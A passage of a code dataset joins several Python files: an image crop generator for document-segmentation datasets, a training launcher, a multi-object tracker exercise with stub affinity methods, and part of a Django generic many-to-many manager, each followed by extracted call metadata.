self.crop_size = crop_size
def __call__(self, img, coordinates):
"""
Args:
            img (PIL Image): Data image to be cropped and converted to tensor.
            coordinates (tuple): (x, y) coordinates of the top-left corner of the crop.
        Returns:
            Data tensor: the cropped and converted image
"""
x_position = coordinates[0]
y_position = coordinates[1]
img_crop = F.to_tensor(
F.crop(img=img, left=x_position, top=y_position, width=self.crop_size, height=self.crop_size))
return img_crop
class CroppedDatasetGenerator:
def __init__(self, input_path: Path, output_path, crop_size_train, crop_size_val, crop_size_test, overlap=0.5,
leading_zeros_length=4, override_existing=False):
# Init list
self.input_path = input_path
self.output_path = output_path
self.crop_size_train = crop_size_train
self.crop_size_val = crop_size_val
self.crop_size_test = crop_size_test
self.overlap = overlap
self.leading_zeros_length = leading_zeros_length
self.override_existing = override_existing
self.generator_train = CropGenerator(input_path=input_path / 'train',
output_path=output_path / 'train',
crop_size=crop_size_train,
overlap=overlap,
leading_zeros_length=leading_zeros_length,
override_existing=override_existing,
progress_title='Cropping "train"')
self.generator_val = CropGenerator(input_path=input_path / 'val',
output_path=output_path / 'val',
crop_size=crop_size_val,
overlap=overlap,
leading_zeros_length=leading_zeros_length,
override_existing=override_existing,
progress_title='Cropping "val"')
self.generator_test = CropGenerator(input_path=input_path / 'test',
output_path=output_path / 'test',
crop_size=crop_size_test,
overlap=overlap,
leading_zeros_length=leading_zeros_length,
override_existing=override_existing,
progress_title='Cropping "test"')
def write_crops(self):
info_list = ['Running CroppedDatasetGenerator.write_crops():',
f'- full_command:',
f'python tools/generate_cropped_dataset.py -i {self.input_path} -o {self.output_path} '
f'-tr {self.crop_size_train} -v {self.crop_size_val} -te {self.crop_size_test} -ov {self.overlap} '
f'-l {self.leading_zeros_length}',
f'',
f'- start_time: \t{datetime.now():%Y-%m-%d_%H-%M-%S}',
f'- input_path: \t{self.input_path}',
f'- output_path: \t{self.output_path}',
f'- crop_size_train: \t{self.crop_size_train}',
f'- crop_size_val: \t{self.crop_size_val}',
f'- crop_size_test: \t{self.crop_size_test}',
f'- overlap: \t{self.overlap}',
f'- leading_zeros_len:\t{self.leading_zeros_length}',
f'- override_existing:\t{self.override_existing}',
''] # empty string to get linebreak at the end when using join
info_str = '\n'.join(info_list)
print(info_str)
# Write info_cropped_dataset.txt
self.output_path.mkdir(parents=True, exist_ok=True)
info_file = self.output_path / 'info_cropped_dataset.txt'
with info_file.open('a') as f:
f.write(info_str)
print(f'Start cropping:')
self.generator_train.write_crops()
self.generator_val.write_crops()
self.generator_test.write_crops()
with info_file.open('a') as f:
f.write(f'- end_time: \t{datetime.now():%Y-%m-%d_%H-%M-%S}\n\n')
class CropGenerator:
def __init__(self, input_path, output_path, crop_size, overlap=0.5, leading_zeros_length=4,
override_existing=False, progress_title=''):
# Init list
self.input_path = input_path
self.output_path = output_path
self.crop_size = crop_size
self.overlap = overlap
self.leading_zeros_length = leading_zeros_length
self.override_existing = override_existing
self.progress_title = progress_title
self.step_size = int(self.crop_size * (1 - self.overlap))
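        # e.g. crop_size=300 with overlap=0.5 gives a step of 150 px between consecutive crop origins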
# List of tuples that contain the path to the gt and image that belong together
self.img_paths = get_img_paths_uncropped(input_path)
self.num_imgs_in_set = len(self.img_paths)
if self.num_imgs_in_set == 0:
raise RuntimeError("Found 0 images in subfolders of: {} \n Supported image extensions are: {}".format(
input_path, ",".join(IMG_EXTENSIONS)))
self.current_split = ''
self.current_img_index = -1
self.img_names_sizes, self.num_horiz_crops, self.num_vert_crops = self._get_img_size_and_crop_numbers()
self.crop_list = self._get_crop_list()
def write_crops(self):
crop_function = ImageCrop(self.crop_size)
for img_index, x, y in tqdm(self.crop_list, desc=self.progress_title):
self._load_image(img_index=img_index)
coordinates = (x, y)
split_name = self.img_names_sizes[img_index][0]
img_full_name = self.img_names_sizes[img_index][1]
img_full_name = Path(img_full_name)
img_name = img_full_name.stem
dest_folder = self.output_path / split_name / img_name
dest_folder.mkdir(parents=True, exist_ok=True)
extension = img_full_name.suffix
filename = f'{img_name}_x{x:0{self.leading_zeros_length}d}_y{y:0{self.leading_zeros_length}d}{extension}'
dest_filename = dest_folder / filename
if not self.override_existing:
if dest_filename.exists():
continue
img = self.get_crop(self.current_img, coordinates=coordinates, crop_function=crop_function)
pil_img = F.to_pil_image(img, mode='RGB')
if extension in JPG_EXTENSIONS:
pil_img.save(dest_filename, quality=95)
else:
# save_image(img, dest_filename)
pil_img.save(dest_filename)
def _load_image(self, img_index):
"""
        Initializes the variables responsible for tracking which crop should be taken next, the current image and the like.
        This should be run every time a new page gets loaded for the test set.
"""
if self.current_img_index == img_index:
return
# Load image
self.current_img = pil_loader(self.img_paths[img_index][0])
# Update pointer to current image
self.current_img_index = img_index
self.current_split = self.img_paths[img_index][1]
def get_crop(self, img, coordinates, crop_function):
img = crop_function(img, coordinates)
return img
def _get_img_size_and_crop_numbers(self):
img_names_sizes = [] # list of tuples -> (split_name, img_name, img_size (H, W))
num_horiz_crops = []
num_vert_crops = []
for img_path, split_name in self.img_paths:
data_img = pil_loader(img_path)
img_names_sizes.append((split_name, img_path.name, data_img.size))
num_horiz_crops.append(math.ceil((data_img.size[0] - self.crop_size) / self.step_size + 1))
num_vert_crops.append(math.ceil((data_img.size[1] - self.crop_size) / self.step_size + 1))
return img_names_sizes, num_horiz_crops, num_vert_crops
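    # Worked example for the formula above: a 1000 px wide image with crop_size=300 and step_size=150
    # gives ceil((1000 - 300) / 150 + 1) = 6 horizontal crops; the last crop is shifted so that it ends
    # exactly at the image border (see _convert_crop_id_to_coordinates).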
def _get_crop_list(self):
return [self._convert_crop_id_to_coordinates(img_index, hcrop_index, vcrop_index) for img_index in
range(self.num_imgs_in_set) for hcrop_index, vcrop_index in
itertools.product(range(self.num_horiz_crops[img_index]),
range(self.num_vert_crops[img_index]))]
def _convert_crop_id_to_coordinates(self, img_index, hcrop_index, vcrop_index):
# X coordinate
if hcrop_index == self.num_horiz_crops[img_index] - 1:
# We are at the end of a line
x_position = self.img_names_sizes[img_index][2][0] - self.crop_size
else:
x_position = self.step_size * hcrop_index
assert x_position < self.img_names_sizes[img_index][2][0] - self.crop_size
# Y coordinate
if vcrop_index == self.num_vert_crops[img_index] - 1:
# We are at the bottom end
y_position = self.img_names_sizes[img_index][2][1] - self.crop_size
else:
y_position = self.step_size * vcrop_index
assert y_position < self.img_names_sizes[img_index][2][1] - self.crop_size
return img_index, x_position, y_position
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-i', '--input_path',
help='Path to the root folder of the dataset (contains train/val/test)',
type=Path,
required=True)
parser.add_argument('-o', '--output_path',
help='Path to the output folder',
type=Path,
required=True)
parser.add_argument('-tr', '--crop_size_train',
help='Size of the crops in the training set',
type=int,
required=True)
parser.add_argument('-v', '--crop_size_val',
help='Size of the crops in the validation set',
type=int,
required=True)
parser.add_argument('-te', '--crop_size_test',
help='Size of the crops in the test set',
type=int,
required=True)
parser.add_argument('-ov', '--overlap',
help='Overlap of the different crops (between 0-1)',
type=float,
default=0.5)
parser.add_argument('-l', '--leading_zeros_length',
help='amount of leading zeros to encode the coordinates',
type=int,
default=4)
parser.add_argument('-oe', '--override_existing',
help='If true overrides the images ',
type=bool,
default=False)
args = parser.parse_args()
dataset_generator = CroppedDatasetGenerator(**args.__dict__)
dataset_generator.write_crops()
# example call arguments
# -i
# /Users/voegtlil/Documents/04_Datasets/003-DataSet/CB55-10-segmentation
# -o
# /Users/voegtlil/Desktop/fun
# -tr
# 300
# -v
# 300
# -te
# 256
# example call arguments
# -i
# /dataset/DIVA-HisDB/segmentation/CB55
# -o
# /net/research-hisdoc/datasets/semantic_segmentation/datasets_cropped/temp-CB55
# -tr
# 300
# -v
# 300
# -te
# 256
# dataset_generator = CroppedDatasetGenerator(
# input_path=Path('/dataset/DIVA-HisDB/segmentation/CB55'),
# output_path=Path('/net/research-hisdoc/datasets/semantic_segmentation/datasets_cropped/CB55'),
# crop_size_train=300,
# crop_size_val=300,
# crop_size_test=256,
# overlap=0.5,
# leading_zeros_length=4,
# override_existing=False)
# dataset_generator.write_crops()
| [((271, 13, 271, 38), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ({}, {}), '()', False, 'import argparse\n'), ((38, 8, 38, 59), 'logging.error', 'logging.error', ({(38, 22, 38, 58): 'f"""Directory not found ({directory})"""'}, {}), "(f'Directory not found ({directory})')", False, 'import logging\n'), ((181, 31, 181, 77), 'tqdm.tqdm', 'tqdm', (), '', False, 'from tqdm import tqdm\n'), ((221, 27, 221, 67), 'torchvision.datasets.folder.pil_loader', 'pil_loader', ({(221, 38, 221, 66): 'self.img_paths[img_index][0]'}, {}), '(self.img_paths[img_index][0])', False, 'from torchvision.datasets.folder import has_file_allowed_extension, pil_loader\n'), ((35, 16, 35, 31), 'pathlib.Path', 'Path', ({(35, 21, 35, 30): 'directory'}, {}), '(directory)', False, 'from pathlib import Path\n'), ((74, 12, 74, 105), 'torchvision.transforms.functional.crop', 'F.crop', (), '', True, 'from torchvision.transforms import functional as F\n'), ((187, 28, 187, 47), 'pathlib.Path', 'Path', ({(187, 33, 187, 46): 'img_full_name'}, {}), '(img_full_name)', False, 'from pathlib import Path\n'), ((203, 22, 203, 53), 'torchvision.transforms.functional.to_pil_image', 'F.to_pil_image', (), '', True, 'from torchvision.transforms import functional as F\n'), ((237, 23, 237, 43), 'torchvision.datasets.folder.pil_loader', 'pil_loader', ({(237, 34, 237, 42): 'img_path'}, {}), '(img_path)', False, 'from torchvision.datasets.folder import has_file_allowed_extension, pil_loader\n'), ((239, 35, 239, 102), 'math.ceil', 'math.ceil', ({(239, 45, 239, 101): '((data_img.size[0] - self.crop_size) / self.step_size + 1)'}, {}), '((data_img.size[0] - self.crop_size) / self.step_size + 1)', False, 'import math\n'), ((240, 34, 240, 101), 'math.ceil', 'math.ceil', ({(240, 44, 240, 100): '((data_img.size[1] - self.crop_size) / self.step_size + 1)'}, {}), '((data_img.size[1] - self.crop_size) / self.step_size + 1)', False, 'import math\n'), ((122, 22, 122, 36), 'datetime.datetime.now', 'datetime.now', ({}, {}), '()', False, 'from datetime import datetime\n'), ((148, 21, 148, 35), 'datetime.datetime.now', 'datetime.now', ({}, {}), '()', False, 'from datetime import datetime\n')] |
seanzhangJM/torch_model_demo | run.py | 3ab3e841e77cf780198516c1910c906acdd3082d | #!/usr/bin/env python
# _*_ coding: utf-8 _*_
# @Time : 2021/12/27 14:04
# @Author : zhangjianming
# @Email : [email protected]
# @File : run_task.py
# @Software: PyCharm
import sys
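# '.' is appended to sys.path so the local torch_model_demo package resolves when the script is run
# from the project directory (an assumption about the intended working directory)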
sys.path.extend(["."])
from torch_model_demo.task.run_task import train_fashion_demo
if __name__ == '__main__':
train_fashion_demo()
| [((11, 0, 11, 22), 'sys.path.extend', 'sys.path.extend', ({(11, 16, 11, 21): "['.']"}, {}), "(['.'])", False, 'import sys\n'), ((16, 4, 16, 24), 'torch_model_demo.task.run_task.train_fashion_demo', 'train_fashion_demo', ({}, {}), '()', False, 'from torch_model_demo.task.run_task import train_fashion_demo\n')] |
OrangeRedeng/CV-SUMMER-CAMP-2021 | practice/4_tracking/tracker.py | 74a65d0b21e4876e1fc1c3d931af76193f36e617 | import numpy as np
import math
import logging as log
import sys
from tqdm import tqdm
from common.feature_distance import calc_features_similarity
from common.common_objects import DetectedObject, validate_detected_object, Bbox
from common.common_objects import get_bbox_center, get_dist, calc_bbox_area
from common.find_best_assignment import solve_assignment_problem
from common.annotation import AnnotationObject, AnnotationStorage
class Track:
__next_track_id = 0
def __init__(self, first_obj):
self.objects = []
self._track_id = Track.__next_track_id
Track.__next_track_id += 1
self.objects.append(first_obj)
def _validate(self):
assert len(self.objects) > 0
for o in self.objects:
validate_detected_object(o)
for i in range(len(self.objects) - 1):
            assert self.objects[i].frame_index < self.objects[i+1].frame_index
def add_object(self, o):
self._validate()
validate_detected_object(o)
last_frame_index = self.objects[-1].frame_index
if not last_frame_index < o.frame_index:
raise RuntimeError("Add object={} to track with the last_frame_index={}".format(o, last_frame_index))
self.objects.append(o)
def last(self):
return self.objects[-1]
def get_id(self):
return self._track_id
def get_bbox_for_frame(self, cur_frame_ind):
"""Finds bbox for frame index using linear approximation"""
self._validate()
i_found = None
for i, o in enumerate(self.objects):
if o.frame_index == cur_frame_ind:
return o.bbox
if o.frame_index > cur_frame_ind:
i_found = i
break
if i_found is None: # cur_frame_ind after the last frame_index in track
return None
if i_found == 0: # cur_frame_ind before the first frame_index in track
return None
log.debug("using linear approximation for track id={}, frame_index={}".format(self._track_id, cur_frame_ind))
o1 = self.objects[i_found-1]
o2 = self.objects[i_found]
assert o1.frame_index < cur_frame_ind < o2.frame_index
dindex = o2.frame_index - o1.frame_index
d_cur_index1 = cur_frame_ind - o1.frame_index
d_cur_index2 = o2.frame_index - cur_frame_ind
bbox1 = o1.bbox
bbox2 = o2.bbox
res_bbox = [None, None, None, None]
for k in range(4):
# linear approximation for all bbox fields
res_bbox[k] = (bbox1[k] * d_cur_index2 + bbox2[k] * d_cur_index1) / dindex
res_bbox = Bbox(res_bbox[0], res_bbox[1], res_bbox[2], res_bbox[3])
return res_bbox
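    # Example: for a track with boxes at frames 10 and 20, get_bbox_for_frame(15) returns the
    # element-wise midpoint of the two boxes (plain linear interpolation of each coordinate).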
class Tracker:
def __init__(self, num_frames_to_remove_track, num_objects_to_make_track_valid, affinity_threshold):
self.tracks = []
self.track_archive = []
self.num_frames_to_remove_track = num_frames_to_remove_track
self.num_objects_to_make_track_valid = num_objects_to_make_track_valid
self.affinity_threshold = affinity_threshold
def add_objects(self, det_objs):
log.debug("begin: handling {} objects".format(len(det_objs)))
if len(det_objs) == 0:
return
frame_index = det_objs[0].frame_index
assert all(o.frame_index == frame_index for o in det_objs), "All det_objs should have the same frame_index"
affinity_matrix = self._build_affinity_matrix(det_objs)
self._validate_affinity_matrix(affinity_matrix, len(self.tracks), len(det_objs))
self._log_affinity_matrix(affinity_matrix)
decision, best_affinity = self._solve_assignment_problem(affinity_matrix)
self._log_decision(decision, best_affinity, det_objs, frame_index)
self._apply_decision(decision, det_objs, frame_index)
self._move_obsolete_tracks_to_archive(frame_index)
log.debug("end: handling {} objects".format(len(det_objs)))
@staticmethod
def _validate_affinity_matrix(affinity_matrix, num_tracks, num_det_objs):
assert isinstance(affinity_matrix, list)
assert len(affinity_matrix) == num_tracks
for affinity_row in affinity_matrix:
assert isinstance(affinity_row, list)
assert len(affinity_row) == num_det_objs
assert all(isinstance(v, float) for v in affinity_row)
assert all(v >= 0 for v in affinity_row)
def _build_affinity_matrix(self, det_objs):
affinity_matrix = []
for t in self.tracks:
affinity_row = []
for o in det_objs:
cur_affinity = self._calc_affinity(t, o)
affinity_row.append(cur_affinity)
affinity_matrix.append(affinity_row)
return affinity_matrix
def _calc_affinity(self, track, obj):
affinity_appearance = self._calc_affinity_appearance(track, obj)
affinity_position = self._calc_affinity_position(track, obj)
affinity_shape = self._calc_affinity_shape(track, obj)
return affinity_appearance * affinity_position * affinity_shape
def _calc_affinity_appearance(self, track, obj):
raise NotImplementedError("The function _calc_affinity_appearance is not implemented -- implement it by yourself")
def _calc_affinity_position(self, track, obj):
raise NotImplementedError("The function _calc_affinity_position is not implemented -- implement it by yourself")
def _calc_affinity_shape(self, track, obj):
raise NotImplementedError("The function _calc_affinity_shape is not implemented -- implement it by yourself")
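    # A possible sketch for the three affinities above (an assumption, not the intended reference
    # solution): appearance affinity could reuse
    #   calc_features_similarity(track.last().appearance_feature, obj.appearance_feature);
    # position affinity could decay with the distance between bbox centers, e.g.
    #   math.exp(-get_dist(get_bbox_center(track.last().bbox), get_bbox_center(obj.bbox))
    #            / math.sqrt(calc_bbox_area(track.last().bbox)));
    # and shape affinity could compare areas, e.g. min(a1, a2) / max(a1, a2) with
    #   a1 = calc_bbox_area(track.last().bbox), a2 = calc_bbox_area(obj.bbox).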
@staticmethod
def _log_affinity_matrix(affinity_matrix):
with np.printoptions(precision=2, suppress=True, threshold=sys.maxsize, linewidth=sys.maxsize):
log.debug("Affinity matrix =\n{}".format(np.array(affinity_matrix)))
def _solve_assignment_problem(self, affinity_matrix):
decision, best_affinity = solve_assignment_problem(affinity_matrix, self.affinity_threshold)
return decision, best_affinity
def _log_decision(self, decision, best_affinity, det_objs, frame_index):
log.debug("Logging decision for frame index={}".format(frame_index))
num_tracks = len(self.tracks)
for track_index in range(num_tracks):
assert track_index in decision
obj_index = decision[track_index] # index of the object assigned to the track
if obj_index is not None:
assert 0 <= obj_index < len(det_objs)
obj_bbox = det_objs[obj_index].bbox
else:
obj_bbox = None
cur_best_affinity = best_affinity[track_index]
if cur_best_affinity is not None:
best_affinity_str = "{:.3f}".format(cur_best_affinity)
else:
best_affinity_str = str(cur_best_affinity)
log.debug("track_index={}, track id={}, last_bbox={}, decision={}, best_affinity={} => {}".format(
track_index, self.tracks[track_index].get_id(),
self.tracks[track_index].last().bbox,
decision[track_index],
best_affinity_str,
obj_bbox))
def _apply_decision(self, decision, det_objs, frame_index):
set_updated_tracks_indexes = set()
num_det_objs = len(det_objs)
num_tracks = len(self.tracks)
object_indexes_not_mapped_to_tracks = set(range(num_det_objs)) # all indexes from 0 to num_det_objs-1
for track_index in range(num_tracks):
assert track_index in decision
obj_index = decision[track_index] # index of the object assigned to the track
if obj_index is None:
# no objects are mapped for this track
continue
assert 0 <= obj_index < num_det_objs
if obj_index not in object_indexes_not_mapped_to_tracks:
raise RuntimeError("ERROR: Algorithm assigned the object {} to several tracks".format(obj_index))
object_indexes_not_mapped_to_tracks.remove(obj_index)
o = det_objs[obj_index]
self.tracks[track_index].add_object(o)
# create new tracks for all the objects not mapped to tracks
for obj_index in object_indexes_not_mapped_to_tracks:
o = det_objs[obj_index]
self._create_new_track(o)
def _create_new_track(self, o):
new_track = Track(o)
self.tracks.append(new_track)
log.debug("created new track: id={} object: frame_index={}, {}".format(
new_track.get_id(), o.frame_index, o.bbox))
def _move_obsolete_tracks_to_archive(self, frame_index):
new_tracks = []
for t in self.tracks:
last_frame_index = t.last().frame_index
if frame_index - last_frame_index >= self.num_frames_to_remove_track:
log.debug("Move the track id={} to archive: the current frame_index={}, "
"the last frame_index in track={}".format(
t.get_id(), frame_index, last_frame_index))
self.track_archive.append(t)
else:
new_tracks.append(t)
self.tracks = new_tracks
def is_track_valid(self, track):
assert isinstance(track, Track)
return len(track.objects) > self.num_objects_to_make_track_valid
def get_all_valid_tracks(self):
res = []
for t in self.track_archive:
if self.is_track_valid(t):
res.append(t)
for t in self.tracks:
if self.is_track_valid(t):
res.append(t)
return res
def convert_tracks_to_annotation_storage(tracks):
ann_objects_by_frame_index = {}
for cur_track in tqdm(tracks, desc="Converting"):
track_id = cur_track.get_id()
first_frame_index = cur_track.objects[0].frame_index
last_frame_index = cur_track.objects[-1].frame_index
for frame_index in range(first_frame_index, last_frame_index+1):
bbox = cur_track.get_bbox_for_frame(frame_index)
tl_x = math.floor(bbox.tl_x)
tl_y = math.floor(bbox.tl_y)
br_x = math.ceil(bbox.br_x)
br_y = math.ceil(bbox.br_y)
detect_obj = DetectedObject(frame_index=frame_index,
bbox=Bbox(tl_x, tl_y, br_x, br_y),
appearance_feature=[])
ann_obj = AnnotationObject(detect_obj=detect_obj,
track_id=track_id)
if frame_index not in ann_objects_by_frame_index:
ann_objects_by_frame_index[frame_index] = {}
ann_objects_by_frame_index[frame_index][track_id] = ann_obj
annotation_objects = []
for frame_index in sorted(ann_objects_by_frame_index.keys()):
cur_ann_objects = ann_objects_by_frame_index[frame_index]
for track_id in sorted(cur_ann_objects.keys()):
annotation_objects.append(cur_ann_objects[track_id])
annotation_storage = AnnotationStorage.create_annotation_storage_from_list(annotation_objects)
return annotation_storage
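# A minimal end-to-end sketch (the subclass, detector and parameter values are assumptions):
#   class MyTracker(Tracker):
#       ...  # implement the three _calc_affinity_* methods
#   tracker = MyTracker(num_frames_to_remove_track=30, num_objects_to_make_track_valid=5,
#                       affinity_threshold=0.2)
#   for frame_index, frame in enumerate(frames):
#       tracker.add_objects(detect_objects(frame, frame_index))  # detect_objects is hypothetical
#   storage = convert_tracks_to_annotation_storage(tracker.get_all_valid_tracks())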
| [((243, 21, 243, 52), 'tqdm.tqdm', 'tqdm', (), '', False, 'from tqdm import tqdm\n'), ((271, 25, 271, 98), 'common.annotation.AnnotationStorage.create_annotation_storage_from_list', 'AnnotationStorage.create_annotation_storage_from_list', ({(271, 79, 271, 97): 'annotation_objects'}, {}), '(annotation_objects)', False, 'from common.annotation import AnnotationObject, AnnotationStorage\n'), ((30, 8, 30, 35), 'common.common_objects.validate_detected_object', 'validate_detected_object', ({(30, 33, 30, 34): 'o'}, {}), '(o)', False, 'from common.common_objects import DetectedObject, validate_detected_object, Bbox\n'), ((75, 19, 75, 75), 'common.common_objects.Bbox', 'Bbox', ({(75, 24, 75, 35): 'res_bbox[0]', (75, 37, 75, 48): 'res_bbox[1]', (75, 50, 75, 61): 'res_bbox[2]', (75, 63, 75, 74): 'res_bbox[3]'}, {}), '(res_bbox[0], res_bbox[1], res_bbox[2], res_bbox[3])', False, 'from common.common_objects import DetectedObject, validate_detected_object, Bbox\n'), ((150, 34, 150, 100), 'common.find_best_assignment.solve_assignment_problem', 'solve_assignment_problem', ({(150, 59, 150, 74): 'affinity_matrix', (150, 76, 150, 99): 'self.affinity_threshold'}, {}), '(affinity_matrix, self.affinity_threshold)', False, 'from common.find_best_assignment import solve_assignment_problem\n'), ((24, 12, 24, 39), 'common.common_objects.validate_detected_object', 'validate_detected_object', ({(24, 37, 24, 38): 'o'}, {}), '(o)', False, 'from common.common_objects import DetectedObject, validate_detected_object, Bbox\n'), ((146, 13, 146, 102), 'numpy.printoptions', 'np.printoptions', (), '', True, 'import numpy as np\n'), ((251, 19, 251, 40), 'math.floor', 'math.floor', ({(251, 30, 251, 39): 'bbox.tl_x'}, {}), '(bbox.tl_x)', False, 'import math\n'), ((252, 19, 252, 40), 'math.floor', 'math.floor', ({(252, 30, 252, 39): 'bbox.tl_y'}, {}), '(bbox.tl_y)', False, 'import math\n'), ((253, 19, 253, 39), 'math.ceil', 'math.ceil', ({(253, 29, 253, 38): 'bbox.br_x'}, {}), '(bbox.br_x)', False, 'import math\n'), ((254, 19, 254, 39), 'math.ceil', 'math.ceil', ({(254, 29, 254, 38): 'bbox.br_y'}, {}), '(bbox.br_y)', False, 'import math\n'), ((258, 22, 259, 57), 'common.annotation.AnnotationObject', 'AnnotationObject', (), '', False, 'from common.annotation import AnnotationObject, AnnotationStorage\n'), ((147, 53, 147, 78), 'numpy.array', 'np.array', ({(147, 62, 147, 77): 'affinity_matrix'}, {}), '(affinity_matrix)', True, 'import numpy as np\n'), ((256, 45, 256, 73), 'common.common_objects.Bbox', 'Bbox', ({(256, 50, 256, 54): 'tl_x', (256, 56, 256, 60): 'tl_y', (256, 62, 256, 66): 'br_x', (256, 68, 256, 72): 'br_y'}, {}), '(tl_x, tl_y, br_x, br_y)', False, 'from common.common_objects import DetectedObject, validate_detected_object, Bbox\n')] |
mikewolfd/django-gm2m | gm2m/managers.py | a8cecc4d6d56c83e8d9c623888f5d07cb6ad8771 | from django.db import router
from django.db.models import Q, Manager
from django.db import connections
from .contenttypes import ct, get_content_type
from .query import GM2MTgtQuerySet
class GM2MBaseManager(Manager):
use_in_migration = True
def __init__(self, instance):
super(GM2MBaseManager, self).__init__()
self.model = self._model # see create_gm2m_related_manager
self.instance = instance
self.pk = instance.pk
self.core_filters = {}
def get_queryset(self):
try:
return self.instance \
._prefetched_objects_cache[self.prefetch_cache_name]
except (AttributeError, KeyError):
db = self._db or router.db_for_read(self.instance.__class__,
instance=self.instance)
return self._get_queryset(using=db)._next_is_sticky() \
.filter(**self.core_filters)
def _get_queryset(self, using):
return super(GM2MBaseManager, self).get_queryset().using(using)
def get_prefetch_queryset(self, instances, queryset=None):
db = self._db or router.db_for_read(self.model,
instance=instances[0])
if queryset is None:
queryset = self._get_queryset(db)
qs, rel_obj_attr, instance_attr = \
self._get_prefetch_queryset_params(instances, queryset, db)
return (qs,
rel_obj_attr,
instance_attr,
False,
self.prefetch_cache_name)
def _get_extra_queryset(self, queryset, q, extra_fields, db):
join_table = self.through._meta.db_table
connection = connections[db]
qn = connection.ops.quote_name
extra = dict(select=dict(
('_prefetch_related_val_%s' % f.attname,
'%s.%s' % (qn(join_table), qn(f.column)))
for f in extra_fields))
return queryset.using(db)._next_is_sticky().filter(q).extra(**extra)
def _check_through_model(self, method_name):
# If the GM2M relation has an intermediary model,
# the add and remove methods are not available.
if not self.through._meta.auto_created:
opts = self.through._meta
raise AttributeError(
'Cannot use %s() on a ManyToManyField which specifies an '
'intermediary model. Use %s.%s\'s Manager instead.'
% (method_name, opts.app_label, opts.object_name))
def _do_add(self, db, through_objs):
"""
Performs items addition
"""
# Add the new entries in the db table
self.through._default_manager.using(db).bulk_create(through_objs)
def add(self, *objs):
"""
Adds objects to the GM2M field
:param *objs: object instances to add
"""
#
self._check_through_model('add')
if not objs:
return
db = router.db_for_write(self.through, instance=self.instance)
self._do_add(db, self._to_add(objs, db))
add.alters_data = True
def _do_remove(self, db, q):
"""
Perfoms items removal from a Q object
"""
self.through._default_manager.using(db).filter(q).delete()
def remove(self, *objs):
"""
Removes objects from the GM2M field
"""
# *objs - objects to remove
self._check_through_model('remove')
if not objs:
return
db = router.db_for_write(self.through, instance=self.instance)
self._do_remove(db, self._to_remove(objs))
remove.alters_data = True
def _do_clear(self, db, filter=None):
self.through._default_manager.using(db).filter(**(filter or {})) \
.delete()
def set(self, objs, **kwargs):
"""
Sets the objs iterable as the set of related objects
(Added for compatibility with Django 1.9)
"""
self._check_through_model('set')
objs = tuple(objs)
clear = kwargs.pop('clear', False)
db = router.db_for_write(self.through, instance=self.instance)
if clear:
# clears all and re-adds
self._do_clear(db)
            self._do_add(db, self._to_add(objs, db))
else:
# just removes the necessary items and adds the missing ones
to_add, to_remove = self._to_change(objs, db)
self._do_remove(db, to_remove)
self._do_add(db, to_add)
set.alters_data = True
def clear(self):
db = router.db_for_write(self.through, instance=self.instance)
self._do_clear(db, self._to_clear())
clear.alters_data = True
class GM2MBaseSrcManager(Manager):
def __init__(self, instance):
# the manager's model is the source model
super(GM2MBaseSrcManager, self).__init__(instance)
self.core_filters['%s__%s' % (self.query_field_name,
self.field_names['tgt_ct'])] = \
get_content_type(self.instance)
self.core_filters['%s__%s' % (self.query_field_name,
self.field_names['tgt_fk'])] = \
self.instance.pk
def _get_prefetch_queryset_params(self, instances, queryset, db):
# we're looking for generic target instances, which should be
# converted to (content_type, primary_key) tuples
q = Q()
for obj in instances:
q = q | Q(**{
'%s__%s' % (self.query_field_name,
self.field_names['tgt_ct']):get_content_type(obj),
'%s__%s' % (self.query_field_name,
self.field_names['tgt_fk']): obj.pk
})
# Annotating the query in order to retrieve the primary model
# content type and id in the same query
# content type must be the 1st element, see rel_obj_attr below
extra_fields = (
self.through._meta.get_field(self.field_names['tgt_ct']),
self.through._meta.get_field(self.field_names['tgt_fk'])
)
qs = self._get_extra_queryset(queryset, q, extra_fields, db)
# primary model retrieval function
def rel_obj_attr(relobj):
t = []
for f in extra_fields:
try:
# t already contains the content type id
# we use get_for_id to retrieve the cached content type
model = ct.ContentType.objects.get_for_id(t[0]) \
.model_class()
except IndexError:
# t is empty
model = ct.ContentType
t.append(model._meta.pk.to_python(
getattr(relobj, '_prefetch_related_val_%s' % f.attname)
))
return tuple(t)
# model attribute retrieval function
instance_attr = lambda inst: \
(get_content_type(inst).pk, inst.pk)
return qs, rel_obj_attr, instance_attr
def _to_add(self, objs, db):
# we're using the reverse relation to add source model
# instances
inst_ct = get_content_type(self.instance)
vals = self.through._default_manager.using(db) \
.values_list(self.field_names['src'],
flat=True) \
.filter(**{
self.field_names['tgt_ct']: inst_ct,
self.field_names['tgt_fk']: self.pk
})
to_add = []
for obj in objs:
if obj.pk not in vals:
to_add.append(self.through(**{
'%s_id' % self.field_names['src']:
obj.pk,
self.field_names['tgt_ct']: inst_ct,
self.field_names['tgt_fk']: self.pk
}))
return to_add
def _to_remove(self, objs):
# we're using the reverse relation to delete source model
# instances
inst_ct = get_content_type(self.instance)
return Q(**{
'%s_id__in' % self.field_names['src']:
[obj.pk for obj in objs],
self.field_names['tgt_ct']: inst_ct,
self.field_names['tgt_fk']: self.pk
})
def _to_change(self, objs, db):
"""
Returns the sets of items to be added and a Q object for removal
"""
inst_ct = get_content_type(self.instance)
vals = list(self.through._default_manager.using(db)
.values_list(self.field_names['src'], flat=True)
.filter(**{
self.field_names['tgt_ct']: inst_ct,
self.field_names['tgt_fk']: self.pk
}))
to_add = set()
to_remove = set()
for obj in objs:
try:
vals.remove(obj.pk)
except ValueError:
# obj.pk is not in vals and must be added
to_add.add(self.through(**{
'%s_id' % self.field_names['src']:
obj.pk,
self.field_names['tgt_ct']: inst_ct,
self.field_names['tgt_fk']: self.pk
}))
for v in vals:
to_remove.add(v)
return to_add, Q(pk__in=to_remove)
def _to_clear(self):
return {
self.field_names['tgt_ct']: get_content_type(self.instance),
self.field_names['tgt_fk']: self.instance.pk
}
class GM2MBaseTgtManager(Manager):
def __init__(self, instance):
# the manager's model is the through model
super(GM2MBaseTgtManager, self).__init__(instance)
source_field = self.through._meta.get_field(
self.field_names['src'])
self.source_related_fields = source_field.related_fields
for __, rh_field in self.source_related_fields:
key = '%s__%s' % (self.query_field_name, rh_field.name)
self.core_filters[key] = getattr(self.instance,
rh_field.attname)
def _get_queryset(self, using):
return GM2MTgtQuerySet(self.model, using=using)
def _get_prefetch_queryset_params(self, instances, queryset, db):
# we're looking for through model instances
query = {}
for lh_field, rh_field in self.source_related_fields:
query['%s__in' % lh_field.name] = \
set(getattr(obj, rh_field.attname)
for obj in instances)
q = Q(**query)
